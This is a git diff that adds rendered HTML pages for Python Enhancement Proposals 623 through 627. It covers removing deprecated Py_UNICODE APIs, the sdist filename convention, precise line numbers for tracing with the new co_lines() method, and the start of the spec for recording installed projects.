PEP 393 was implemented in Python 3.3, which was released in 2012. Old +APIs have been deprecated since then, and their removal was scheduled for +Python 4.0.

+

Python 4.0 was expected to be the next version after Python 3.9 when PEP 393 +was accepted. But the version after Python 3.9 is Python 3.10, +not 4.0. This is why this PEP schedules the removal plan again.

+
+
+

Python 2 reached EOL

+

Since Python 2 didn’t have the PEP 393 Unicode implementation, legacy +APIs might have helped C extension modules support both Python 2 and 3.

+

But Python 2 reached its EOL in 2020. We can now remove legacy APIs that were +kept for compatibility with Python 2.

+
+
+
+

Plan

+
+

Python 3.9

+

These macros and functions are marked as deprecated, using the +Py_DEPRECATED macro.

+
    +
  • Py_UNICODE_WSTR_LENGTH()
  • +
  • PyUnicode_GET_SIZE()
  • +
  • PyUnicode_GetSize()
  • +
  • PyUnicode_GET_DATA_SIZE()
  • +
  • PyUnicode_AS_UNICODE()
  • +
  • PyUnicode_AS_DATA()
  • +
  • PyUnicode_AsUnicode()
  • +
  • _PyUnicode_AsUnicode()
  • +
  • PyUnicode_AsUnicodeAndSize()
  • +
  • PyUnicode_FromUnicode()
  • +
+
+
+

Python 3.10

+
    +
  • The following macros and enum members are marked as deprecated. The +Py_DEPRECATED(3.10) macro is used where possible. Where the macro can +not easily be used, they are deprecated only in comments and documentation.
      +
    • PyUnicode_WCHAR_KIND
    • +
    • PyUnicode_READY()
    • +
    • PyUnicode_IS_READY()
    • +
    • PyUnicode_IS_COMPACT()
    • +
    +
  • +
  • PyUnicode_FromUnicode(NULL, size) and +PyUnicode_FromStringAndSize(NULL, size) emit +DeprecationWarning when size > 0.
  • +
  • PyArg_ParseTuple() and PyArg_ParseTupleAndKeywords() emit +DeprecationWarning when u, u#, Z, and Z# formats are used.
  • +
+
+
+

Python 3.12

+
    +
  • The following members are removed from the Unicode structures:
      +
    • wstr
    • +
    • wstr_length
    • +
    • state.compact
    • +
    • state.ready
    • +
    +
  • +
  • The PyUnicodeObject structure is removed.
  • +
  • The following macros, functions, and enum members are removed:
      +
    • Py_UNICODE_WSTR_LENGTH()
    • +
    • PyUnicode_GET_SIZE()
    • +
    • PyUnicode_GetSize()
    • +
    • PyUnicode_GET_DATA_SIZE()
    • +
    • PyUnicode_AS_UNICODE()
    • +
    • PyUnicode_AS_DATA()
    • +
    • PyUnicode_AsUnicode()
    • +
    • _PyUnicode_AsUnicode()
    • +
    • PyUnicode_AsUnicodeAndSize()
    • +
    • PyUnicode_FromUnicode()
    • +
    • PyUnicode_WCHAR_KIND
    • +
    • PyUnicode_READY()
    • +
    • PyUnicode_IS_READY()
    • +
    • PyUnicode_IS_COMPACT()
    • +
    +
  • +
  • PyUnicode_FromStringAndSize(NULL, size) raises +RuntimeError when size > 0.
  • +
  • PyArg_ParseTuple() and PyArg_ParseTupleAndKeywords() raise +SystemError when u, u#, Z, and Z# formats are used, +as with other unsupported format characters.
  • +
+
+
+
+

Discussion

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0623.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0624/index.html b/pep-0624/index.html new file mode 100644 index 00000000000..ba8dbb96e2e --- /dev/null +++ b/pep-0624/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 624 – Remove Py_UNICODE encoder APIs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 624 – Remove Py_UNICODE encoder APIs

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-Jul-2020
+
Python-Version:
+
3.11
+
Post-History:
+
08-Jul-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to remove deprecated Py_UNICODE encoder APIs in Python 3.11:

+
    +
  • PyUnicode_Encode()
  • +
  • PyUnicode_EncodeASCII()
  • +
  • PyUnicode_EncodeLatin1()
  • +
  • PyUnicode_EncodeUTF7()
  • +
  • PyUnicode_EncodeUTF8()
  • +
  • PyUnicode_EncodeUTF16()
  • +
  • PyUnicode_EncodeUTF32()
  • +
  • PyUnicode_EncodeUnicodeEscape()
  • +
  • PyUnicode_EncodeRawUnicodeEscape()
  • +
  • PyUnicode_EncodeCharmap()
  • +
  • PyUnicode_TranslateCharmap()
  • +
  • PyUnicode_EncodeDecimal()
  • +
  • PyUnicode_TransformDecimalToASCII()
  • +
+
+

Note

+

PEP 623 proposes to remove +Unicode object APIs relating to Py_UNICODE. This PEP, on the other hand, +does not relate to the Unicode object itself. These PEPs are split because +they have different motivations and need different discussions.

+
+
+
+

Motivation

+

In general, reducing the number of APIs that have been deprecated for +a long time and have few users is a good idea: not only does it +improve the maintainability of CPython, it also helps API users +and other Python implementations.

+
+
+

Rationale

+
+

Deprecated since Python 3.3

+

Py_UNICODE and the APIs using it have been deprecated since Python 3.3.

+
+
+

Inefficient

+

All of these APIs are implemented using PyUnicode_FromWideChar. +So these APIs are inefficient when users want to encode a Unicode +object.

+
+
+

Not used widely

+

When searching the top 4000 PyPI packages [1], only pyodbc uses +these APIs:

+
    +
  • PyUnicode_EncodeUTF8()
  • +
  • PyUnicode_EncodeUTF16()
  • +
+

pyodbc uses these APIs to encode a Unicode object into a bytes object, +so it is easy to fix. [2]

+
+
+
+

Alternative APIs

+

There are alternative APIs that accept PyObject *unicode instead of +Py_UNICODE *. Users can migrate to them.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Deprecated APIAlternative APIs
PyUnicode_Encode()PyUnicode_AsEncodedString()
PyUnicode_EncodeASCII()PyUnicode_AsASCIIString() (1)
PyUnicode_EncodeLatin1()PyUnicode_AsLatin1String() (1)
PyUnicode_EncodeUTF7()(2)
PyUnicode_EncodeUTF8()PyUnicode_AsUTF8String() (1)
PyUnicode_EncodeUTF16()PyUnicode_AsUTF16String() (3)
PyUnicode_EncodeUTF32()PyUnicode_AsUTF32String() (3)
PyUnicode_EncodeUnicodeEscape()PyUnicode_AsUnicodeEscapeString()
PyUnicode_EncodeRawUnicodeEscape()PyUnicode_AsRawUnicodeEscapeString()
PyUnicode_EncodeCharmap()PyUnicode_AsCharmapString() (1)
PyUnicode_TranslateCharmap()PyUnicode_Translate()
PyUnicode_EncodeDecimal()(4)
PyUnicode_TransformDecimalToASCII()(4)
+

Notes:

+
    +
  1. const char *errors parameter is missing.
  +
  2. There is no public alternative API. But users can use the generic +PyUnicode_AsEncodedString() instead.
  +
  3. const char *errors, int byteorder parameters are missing.
  +
  4. There is no direct replacement. But Py_UNICODE_TODECIMAL +can be used instead. CPython uses +_PyUnicode_TransformDecimalAndSpaceToASCII for converting +from Unicode to numbers instead.
  +
+
+
+

Plan

+

Remove these APIs in Python 3.11. They have been deprecated already.

+
    +
  • PyUnicode_Encode()
  • +
  • PyUnicode_EncodeASCII()
  • +
  • PyUnicode_EncodeLatin1()
  • +
  • PyUnicode_EncodeUTF7()
  • +
  • PyUnicode_EncodeUTF8()
  • +
  • PyUnicode_EncodeUTF16()
  • +
  • PyUnicode_EncodeUTF32()
  • +
  • PyUnicode_EncodeUnicodeEscape()
  • +
  • PyUnicode_EncodeRawUnicodeEscape()
  • +
  • PyUnicode_EncodeCharmap()
  • +
  • PyUnicode_TranslateCharmap()
  • +
  • PyUnicode_EncodeDecimal()
  • +
  • PyUnicode_TransformDecimalToASCII()
  • +
+
+
+

Alternative Ideas

+
+

Replace Py_UNICODE* with PyObject*

+

As described in the “Alternative APIs” section, some APIs don’t have +public alternative APIs accepting PyObject *unicode input, +and some public alternative APIs have restrictions, such as missing +errors and byteorder parameters.

+

Instead of removing deprecated APIs, we can reuse their names for +alternative public APIs.

+

Since we have private alternative APIs already, this would just be a rename +from the private names to the public (but currently deprecated) names.

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Rename toRename from
PyUnicode_EncodeASCII()_PyUnicode_AsASCIIString()
PyUnicode_EncodeLatin1()_PyUnicode_AsLatin1String()
PyUnicode_EncodeUTF7()_PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()_PyUnicode_AsUTF8String()
PyUnicode_EncodeUTF16()_PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()_PyUnicode_EncodeUTF32()
+

Pros:

+
    +
  • We have a more consistent API set.
  • +
+

Cons:

+
    +
  • Backward incompatible.
  • +
  • We have more public APIs to maintain for rare use cases.
  • +
  • Existing public APIs are enough for most use cases, and +PyUnicode_AsEncodedString() can be used in other cases.
  • +
+
+
+

Replace Py_UNICODE* with Py_UCS4*

+

We can replace Py_UNICODE with Py_UCS4 and undeprecate +these APIs.

+

The UTF-8, UTF-16, and UTF-32 encoders support Py_UCS4 internally. +So PyUnicode_EncodeUTF8(), PyUnicode_EncodeUTF16(), and +PyUnicode_EncodeUTF32() can avoid creating a temporary Unicode +object.

+

Pros:

+
    +
  • We can avoid creating a temporary Unicode object when encoding from +Py_UCS4* into a bytes object with the UTF-8, UTF-16, and UTF-32 codecs.
  • +
+

Cons:

+
    +
  • Backward incompatible.
  • +
  • We have more public APIs to maintain for rare use cases.
  • +
  • Other Python implementations that want to support Python/C API need +to support these APIs too.
  • +
  • If we change the Unicode internal representation to UTF-8 in the +future, we need to keep UCS-4 support only for these APIs.
  • +
+
+
+

Replace Py_UNICODE* with wchar_t*

+

We can replace Py_UNICODE with wchar_t. Since Py_UNICODE +is already a typedef of wchar_t, this is the status quo.

+

On platforms where sizeof(wchar_t) == 4, we can avoid creating a +temporary Unicode object when encoding from wchar_t* to bytes +objects using the UTF-8, UTF-16, and UTF-32 codecs, like the “Replace +Py_UNICODE* with Py_UCS4*” idea.

+

Pros:

+
    +
  • Backward compatible.
  • +
  • We can avoid creating a temporary Unicode object when encoding from +wchar_t* into a bytes object with the UTF-8, UTF-16, and UTF-32 codecs +on platforms where sizeof(wchar_t) == 4.
  • +
+

Cons:

+
    +
  • Although Windows is the major platform that uses wchar_t +heavily, these APIs always need to create a temporary Unicode object +there, because sizeof(wchar_t) == 2 on Windows.
  • +
  • We have more public APIs to maintain for rare use cases.
  • +
  • Other Python implementations that want to support Python/C API need +to support these APIs too.
  • +
  • If we change the Unicode internal representation to UTF-8 in the +future, we need to keep UCS-4 support only for these APIs.
  • +
+
+
+
+

Rejected Ideas

+
+

Emit runtime warning

+

In addition to the existing compiler warnings, emitting a runtime +DeprecationWarning was suggested.

+

But these APIs don’t release the GIL for now, and emitting a warning from +such APIs is not safe. See this example:

+
PyObject *u = PyList_GET_ITEM(list, i);  // u is borrowed reference.
+PyObject *b = PyUnicode_EncodeUTF8(PyUnicode_AS_UNICODE(u),
+        PyUnicode_GET_SIZE(u), NULL);
+// Assumes u is still living reference.
+PyObject *t = PyTuple_Pack(2, u, b);
+Py_DECREF(b);
+return t;
+
+
+

If we emit a Python warning from PyUnicode_EncodeUTF8(), warning +filters and other threads may change the list, and u may be +a dangling reference after PyUnicode_EncodeUTF8() returns.

+
+
+
+

Discussions

+ +
+

Objections

+
    +
  • Removing these APIs removes the ability to use codecs without a temporary +Unicode object.
      +
    • Codecs have not been able to encode a Unicode buffer directly without a +temporary Unicode object since Python 3.3. All these APIs create a temporary +Unicode object for now, so removing them doesn’t reduce any +abilities.
    • +
    +
  • +
  • Why not remove decoder APIs too?
      +
    • They are part of stable ABI.
    • +
    • PyUnicode_DecodeASCII() and PyUnicode_DecodeUTF8() are +used very widely. Deprecating them is not worthwhile.
    • +
    • Decoder APIs can decode from byte buffer directly, without +creating temporary bytes object. On the other hand, encoder APIs +can not avoid temporary Unicode object.
    • +
    +
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0624.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0625/index.html b/pep-0625/index.html new file mode 100644 index 00000000000..6563630dd61 --- /dev/null +++ b/pep-0625/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 625 – Filename of a Source Distribution | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 625 – Filename of a Source Distribution

+
+
Author:
+
Tzu-ping Chung <uranusjr at gmail.com>, +Paul Moore <p.f.moore at gmail.com>
+
PEP-Delegate:
+
Pradyun Gedam <pradyunsg at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Jul-2020
+
Post-History:
+
08-Jul-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a standard naming scheme for a Source Distribution, also +known as an sdist. An sdist is distinct from an arbitrary archive file +containing source code of Python packages, and can be used to communicate +information about the distribution to packaging tools.

+

A standard sdist specified here is a gzipped tar file with a specially +formatted filename and the usual .tar.gz suffix. This PEP does not specify +the contents of the tarball, as that is covered in other specifications.

+
+
+

Motivation

+

An sdist is a Python package distribution that contains “source code” of the +Python package, and requires a build step to be turned into a wheel on +installation. This format is often considered as an unbuilt counterpart of a +PEP 427 wheel, and given special treatments in various parts of the +packaging ecosystem.

+

The content of an sdist is specified in PEP 517 and PEP 643, but currently +the filename of the sdist is incompletely specified, meaning that consumers +of the format must download and process the sdist to confirm the name and +version of the distribution included within.

+

Installers currently rely on heuristics to infer the name and/or version from +the filename, to help the installation process. pip, for example, parses the +filename of an sdist from a PEP 503 index, to obtain the distribution’s +project name and version for dependency resolution purposes. But due to the +lack of specification, the installer does not have any guarantee as to the +correctness of the inferred data, and must verify it at some point by locally +building the distribution metadata.

+

This build step is awkward for a certain class of operations, when the user +does not expect the build process to occur. pypa/pip#8387 describes an +example. The command pip download --no-deps --no-binary=numpy numpy is +expected to only download an sdist for numpy, since we do not need to check +for dependencies, and both the name and version are available by introspecting +the downloaded filename. pip, however, cannot assume the downloaded archive +follows the convention, and must build and check the metadata. For a PEP 518 +project, this means running the prepare_metadata_for_build_wheel hook +specified in PEP 517, which incurs significant overhead.

+
+
+

Rationale

+

By creating a special filename scheme for the sdist format, this PEP frees up +tools from the time-consuming metadata verification step when they only need +the metadata available in the filename.

+

This PEP also serves as the formal specification for the long-standing +filename convention used by the current sdist implementations. The filename +contains the distribution name and version, to aid tools in identifying a +distribution without needing to download and unarchive the file and perform +costly metadata generation for introspection, if all the information they need +is available in the filename.

+
+
+

Specification

+

The name of an sdist should be {distribution}-{version}.tar.gz.

+
    +
  • distribution is the name of the distribution as defined in PEP 345, +and normalised as described in the wheel spec e.g. 'pip', +'flit_core'.
  • +
  • version is the version of the distribution as defined in PEP 440, +e.g. 20.2, and normalised according to the rules in that PEP.
  • +
+

An sdist must be a gzipped tar archive in pax format, that is able to be +extracted by the standard library tarfile module with the open flag +'r:gz'.

+

Code that produces an sdist file MUST give the file a name that matches this +specification. The specification of the build_sdist hook from PEP 517 is +extended to require this naming convention.

+

Code that processes sdist files MAY determine the distribution name and version +by simply parsing the filename, and is not required to verify that information +by generating or reading the metadata from the sdist contents.

+

Conforming sdist files can be recognised by the presence of the .tar.gz +suffix and a single hyphen in the filename. Note that some legacy files may +also match these criteria, but this is not expected to be an issue in practice. +See the “Backwards Compatibility” section of this document for more details.
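As a rough sketch (ours, not part of the specification), a consumer could parse a conforming filename like this; real tools would still need a fallback path for legacy names:

def parse_sdist_filename(filename):
    if not filename.endswith(".tar.gz"):
        raise ValueError(f"not an sdist filename: {filename!r}")
    stem = filename[: -len(".tar.gz")]
    # A conforming name contains a single hyphen: {distribution}-{version}.
    distribution, sep, version = stem.partition("-")
    if not sep or "-" in version:
        raise ValueError(f"legacy or non-conforming name: {filename!r}")
    return distribution, version

# parse_sdist_filename("pip-20.2.tar.gz")  # -> ("pip", "20.2")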

+
+
+

Backwards Compatibility

+

The new filename scheme is a subset of the current informal naming +convention for sdist files, so tools that create or publish files conforming +to this standard will be readable by older tools that only understand the +previous naming conventions.

+

Tools that consume sdist filenames would technically not be able to determine +whether a file is using the new standard or a legacy form. However, a review +of the filenames on PyPI determined that 37% of files are obviously legacy +(because they contain multiple or no hyphens) and of the remainder, parsing +according to this PEP gives the correct answer in all but 0.004% of cases.

+

Currently, tools that consume sdists should, if they are to be fully correct, +treat the name and version parsed from the filename as provisional, and verify +them by downloading the file and generating the actual metadata (or reading it, +if the sdist conforms to PEP 643). Tools supporting this specification can +treat the name and version from the filename as definitive. In theory, this +could risk mistakes if a legacy filename is assumed to conform to this PEP, +but in practice the chance of this appears to be vanishingly small.

+
+
+

Rejected Ideas

+
+

Rely on the specification for sdist metadata

+

Since this PEP was first written, PEP 643 has been accepted, defining a +trustworthy, standard sdist metadata format. This allows distribution metadata +(and in particular name and version) to be determined statically.

+

This is not considered sufficient, however, as in a number of significant +cases (for example, reading filenames from a package index) the application +only has access to the filename, and reading metadata would involve a +potentially costly download.

+
+
+

Use a dedicated file extension

+

The original version of this PEP proposed a filename of +{distribution}-{version}.sdist. This has the advantage of being explicit, +as well as allowing a future change to the storage format without needing a +further change of the file naming convention.

+

However, there are significant compatibility issues with a new extension. Index servers may currently disallow unknown extensions, and if we introduced a new one, it is not clear how to handle cases like a legacy index trying to mirror an index that hosts new-style sdists. Is it acceptable to only partially mirror, omitting sdists for newer versions of projects? Also, build backends that produce the new format would be incompatible with index servers that only accept the old format, and as there is often no way for a user to request an older version of a backend when doing a build, this could make it impossible to build and upload sdists.

+
+
+

Augment a currently common sdist naming scheme

+

A scheme {distribution}-{version}.sdist.tar.gz was raised during the +initial discussion. This was abandoned due to backwards compatibility issues +with currently available installation tools. pip 20.1, for example, would +parse distribution-1.0.sdist.tar.gz as project distribution with +version 1.0.sdist. This would cause the sdist to be downloaded, but fail to +install due to inconsistent metadata.

+

The main advantage of this proposal was that it is easier for tools to +recognise the new-style naming. But this is not a particularly significant +benefit, given that all sdists with a single hyphen in the name are parsed +the same way under the old and new rules.

+
+
+
+

Open Issues

+

The contents of an sdist are required to contain a single top-level directory +named {name}-{version}. Currently no normalisation rules are required +for the components of this name. Should this PEP require that the same normalisation +rules are applied here as for the filename? Note that in practice, it is likely +that tools will create the two names using the same code, so normalisation is +likely to happen naturally, even if it is not explicitly required.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0625.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0626/index.html b/pep-0626/index.html
new file mode 100644
index 00000000000..4072955ebad
--- /dev/null
+++ b/pep-0626/index.html
@@ -0,0 +1,479 @@
PEP 626 – Precise line numbers for debugging and other tools. | peps.python.org
+
+


+ + +
+
+
+

PEP 626 – Precise line numbers for debugging and other tools.

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
BDFL-Delegate:
+
Pablo Galindo <pablogsal at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Jul-2020
+
Python-Version:
+
3.10
+
Post-History:
+
17-Jul-2020
+
+
+
+
+
+

Abstract

+

Python should guarantee that when tracing is turned on, “line” tracing events are generated for all lines of code executed and only for lines of +code that are executed.

+

The f_lineno attribute of frame objects should always contain the expected line number. +During frame execution, the expected line number is the line number of source code currently being executed. +After a frame has completed, either by returning or by raising an exception, +the expected line number is the line number of the last line of source that was executed.

+

A side effect of ensuring correct line numbers is that some bytecodes will need to be marked as artificial, and not have a meaningful line number. To assist tools, a new co_lines attribute will be added that describes the mapping from bytecode to source.

+
+
+

Motivation

+

Users of sys.settrace and associated tools should be able to rely on tracing events being +generated for all lines of code, and only for actual code. +They should also be able to assume that the line number in f_lineno is correct.

+

The current implementation mostly does this, but fails in a few cases. +This requires workarounds in tooling and is a nuisance for alternative Python implementations.

+

Having this guarantee also benefits implementers of CPython in the long term, as the current behaviour is not obvious and has some odd corner cases.

+
+
+

Rationale

+

In order to guarantee that line events are generated when expected, the co_lnotab attribute, in its current form, +can no longer be the source of truth for line number information.

+

Rather than attempt to fix the co_lnotab attribute, a new method +co_lines() will be added, which returns an iterator over bytecode offsets and source code lines.

+

Ensuring that the bytecode is annotated correctly to enable accurate line number information means that +some bytecodes must be marked as artificial, and not have a line number.

+

Some care must be taken not to break existing tooling. +To minimize breakage, the co_lnotab attribute will be retained, but lazily generated on demand.

+
+
+

Specification

+

Line events and the f_lineno attribute should act as an experienced Python user would expect in all cases.

+
+

Tracing

+

Tracing generates events for calls, returns, exceptions, lines of source code executed, and, under some circumstances, instructions executed.

+

Only line events are covered by this PEP.

+

When tracing is turned on, line events will be generated when:

+
    +
  • A new line of source code is reached.
  • +
  • A backwards jump occurs, even if it jumps to the same line, as may happen in list comprehensions.
  • +
+

Additionally, line events will never be generated for source code lines that are not executed.
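+
To observe the guarantee, a minimal sketch using ordinary sys.settrace (no new API is involved) can print events in the "name", f_lineno format used in the examples below:
+
import sys
+
+def print_line_events(frame, event, arg):
+    # Report only "line" events; ignore calls, returns and exceptions.
+    if event == "line":
+        print('"line"', frame.f_lineno)
+    return print_line_events  # keep receiving events for this frame
+
+def demo(a):
+    if a:
+        x = 1
+    else:
+        x = 2
+
+sys.settrace(print_line_events)
+demo(True)
+sys.settrace(None)
+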

+
+
+

What is considered to be code for the purposes of tracing

+

All expressions and parts of expressions are considered to be executable code.

+

In general, all statements are also considered to be executable code. However, when a statement is spread over several lines, we must decide which parts of the statement count as executable code.

+

Statements are made up of keywords and expressions. Not all keywords have a direct runtime effect, so not all keywords are considered to be executable code. For example, else is a necessary part of an if statement, but there is no runtime effect associated with an else.

+

For the purposes of tracing, the following keywords will not be considered to be executable code:

+
    +
  • del – The expression to be deleted is treated as the executable code.
  • +
  • else – No runtime effect
  • +
  • finally – No runtime effect
  • +
  • global – Purely declarative
  • +
  • nonlocal – Purely declarative
  • +
+

All other keywords are considered to be executable code.

+
+
+

Example event sequences

+

In the following examples, events are listed as “name”, f_lineno pairs.

+

The code

+
1.     global x
+2.     x = a
+
+
+

generates the following event:

+
"line" 2
+
+
+

The code

+
1.     try:
+2.        pass
+3.     finally:
+4.        pass
+
+
+

generates the following events:

+
"line" 1
+"line" 2
+"line" 4
+
+
+

The code

+
1.      for (
+2.          x) in [1]:
+3.          pass
+4.      return
+
+
+

generates the following events:

+
"line" 2       # evaluate [1]
+"line" 1       # for
+"line" 2       # store to x
+"line" 3       # pass
+"line" 1       # for
+"line" 4       # return
+"return" 1
+
+
+
+
+

The f_lineno attribute

+
    +
  • When a frame object is created, the f_lineno attribute will be set to the line +at which the function or class is defined; that is the line on which the def or class keyword appears. +For modules it will be set to zero.
  • +
  • The f_lineno attribute will be updated to match the line number about to be executed, +even if tracing is turned off and no event is generated.
  • +
+
+
+

The new co_lines() method of code objects

+

The co_lines() method will return an iterator which yields tuples of values, +each representing the line number of a range of bytecodes. Each tuple will consist of three values:

+
    +
  • start – The offset (inclusive) of the start of the bytecode range
  • +
  • end – The offset (exclusive) of the end of the bytecode range
  • +
  • line – The line number, or None if the bytecodes in the given range do not have a line number.
  • +
+

The sequence generated will have the following properties:

+
    +
  • The first range in the sequence will have a start of 0
  • +
  • The (start, end) ranges will be non-decreasing and consecutive. That is, for any pair of tuples, the start of the second will be equal to the end of the first.
  • +
  • No range will be backwards, that is end >= start for all triples.
  • +
  • The final range in the sequence will have end equal to the size of the bytecode.
  • +
  • line will either be a positive integer, or None
  • +
+
+

Zero width ranges

+

Zero width ranges, that is, ranges where start == end, are allowed. Zero width ranges are used for lines that are present in the source code, but have been eliminated by the bytecode compiler.

+
+
+
+

The co_linetable attribute

+

The co_linetable attribute will hold the line number information. +The format is opaque, unspecified and may be changed without notice. +The attribute is public only to support creation of new code objects.

+
+
+

The co_lnotab attribute

+

Historically, the co_lnotab attribute held a mapping from bytecode offset to line number, but that format cannot represent bytecodes without a line number. For backward compatibility, the co_lnotab bytes object will be lazily created when needed. For ranges of bytecodes without a line number, the line number of the previous bytecode range will be used.

+

Tools that parse the co_lnotab table should move to using the new co_lines() method as soon as is practical.
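+
For example, on Python 3.10 and later a tool can simply iterate over the new method (a minimal sketch):
+
def f(a):
+    if a:
+        return 1
+    return 2
+
+# Each triple is (start, end, line); line may be None for artificial bytecodes.
+for start, end, line in f.__code__.co_lines():
+    print(f"bytecodes [{start}, {end}) -> line {line}")
+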

+
+
+
+

Backwards Compatibility

+

The co_lnotab attribute will be deprecated in 3.10 and removed in 3.12.

+

Any tools that parse the co_lnotab attribute of code objects will need to move to using co_lines() before 3.12 is released. +Tools that use sys.settrace will be unaffected, except in cases where the “line” events they receive are more accurate.

+
+

Examples of code for which the sequence of trace events will change

+

In the following examples, events are listed as “name”, f_lineno pairs.

+
+

pass statement in an if statement.

+
0.  def spam(a):
+1.      if a:
+2.          eggs()
+3.      else:
+4.          pass
+
+
+

If a is True, then the sequence of events generated by Python 3.9 is:

+
"line" 1
+"line" 2
+"line" 4
+"return" 4
+
+
+

From 3.10 the sequence will be:

+
"line" 1
+"line" 2
+"return" 2
+
+
+
+
+

Multiple pass statements.

+
0.  def bar():
+1.      pass
+2.      pass
+3.      pass
+
+
+

The sequence of events generated by Python 3.9 is:

+
"line" 3
+"return" 3
+
+
+

From 3.10 the sequence will be:

+
"line" 1
+"line" 2
+"line" 3
+"return" 3
+
+
+
+
+
+

C API

+

Access to the f_lineno attribute of frame objects through C API functions is unchanged. +f_lineno can be read by PyFrame_GetLineNumber. f_lineno can only be set via PyObject_SetAttr and similar functions.

+

Accessing f_lineno directly through the underlying data structure is forbidden.

+
+
+

Out of process debuggers and profilers

+

Out of process tools, such as py-spy [1], cannot use the C-API, and must parse the line number table themselves. +Although the line number table format may change without warning, +it will not change during a release unless absolutely necessary for a bug fix.

+

To reduce the work required to implement these tools, the following C struct and utility functions are provided. Note that these functions are not part of the C-API, so they will need to be linked into any code that needs to use them.

+
typedef struct addressrange {
+    int ar_start;
+    int ar_end;
+    int ar_line;
+    struct _opaque opaque;
+} PyCodeAddressRange;
+
+void PyLineTable_InitAddressRange(char *linetable, Py_ssize_t length, int firstlineno, PyCodeAddressRange *range);
+int PyLineTable_NextAddressRange(PyCodeAddressRange *range);
+int PyLineTable_PreviousAddressRange(PyCodeAddressRange *range);
+
+
+

PyLineTable_InitAddressRange initializes the PyCodeAddressRange struct from the line number table and first line number.

+

PyLineTable_NextAddressRange advances the range to the next entry, returning non-zero if valid.

+

PyLineTable_PreviousAddressRange retreats the range to the previous entry, returning non-zero if valid.

+
+

Note

+

The data in linetable is immutable, but its lifetime depends on its code object. +For reliable operation, linetable should be copied into a local buffer before calling PyLineTable_InitAddressRange.

+
+

Although these functions are not part of the C-API, they will be provided by all future versions of CPython. The PyLineTable_ functions do not call into the C-API, so they can be safely copied into any tool that needs to use them. The PyCodeAddressRange struct will not be changed, but the _opaque struct is not part of the specification and may change.

+
+

Note

+

The PyCodeAddressRange struct has changed from the original version of this PEP, where the additional fields were defined but were liable to change.

+
+

For example, the following code prints out all the address ranges:

+
void print_address_ranges(char *linetable, Py_ssize_t length, int firstlineno)
+{
+    PyCodeAddressRange range;
+    PyLineTable_InitAddressRange(linetable, length, firstlineno, &range);
+    while (PyLineTable_NextAddressRange(&range)) {
+        printf("Bytecodes from %d (inclusive) to %d (exclusive) ",
+               range.ar_start, range.ar_end);
+        if (range.ar_line < 0) {
+            /* ar_line < 0 means no line number */
+            printf("have no line number\n");
+        }
+        else {
+            printf("have line number %d\n", range.ar_line);
+        }
+    }
+}
+
+
+
+
+
+

Performance Implications

+

In general, there should be no change in performance. +When tracing, programs should run a little faster as the new table format can be designed with line number calculation speed in mind. +Code with long sequences of pass statements will probably become a bit slower.

+
+
+

Reference Implementation

+

https://github.com/markshannon/cpython/tree/new-linetable-format-version-2

+
+ +
+

References

+
[1] py-spy: https://github.com/benfred/py-spy
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0626.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0627/index.html b/pep-0627/index.html
new file mode 100644
index 00000000000..d945a42b808
--- /dev/null
+++ b/pep-0627/index.html
@@ -0,0 +1,351 @@
PEP 627 – Recording installed projects | peps.python.org
+
+


+ + +
+
+
+

PEP 627 – Recording installed projects

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
15-Jul-2020
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Recording installed projects, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP clarifies and updates PEP 376 (Database of Installed Python +Distributions), rewriting it as an interoperability standard. +It moves the canonical location of the standard to the Python +Packaging Authority (PyPA) standards repository, and sets up guidelines +for changing it.

+

Two files in installed .dist-info directories are made optional: +RECORD (which PEP 376 lists as mandatory, but suggests it can be left out +for “system packages”), and INSTALLER.

+
+
+

Motivation

+

Python packaging is moving from relying on specific tools (Setuptools and pip) +toward an ecosystem of tools and tool-agnostic interoperability standards.

+

PEP 376 is not written as an interoperability standard. +It describes implementation details of specific tools and libraries, +and is underspecified, leaving much room for implementation-defined behavior.

+

This is a proposal to “distill” the standard from PEP 376, clarify it, +and rewrite it to be tool-agnostic.

+

The aim of this PEP is to have a better standard, not necessarily a perfect one. +Some issues are left to later clarification.

+
+
+

Rationale Change

+

PEP 376’s rationale focuses on two problems:

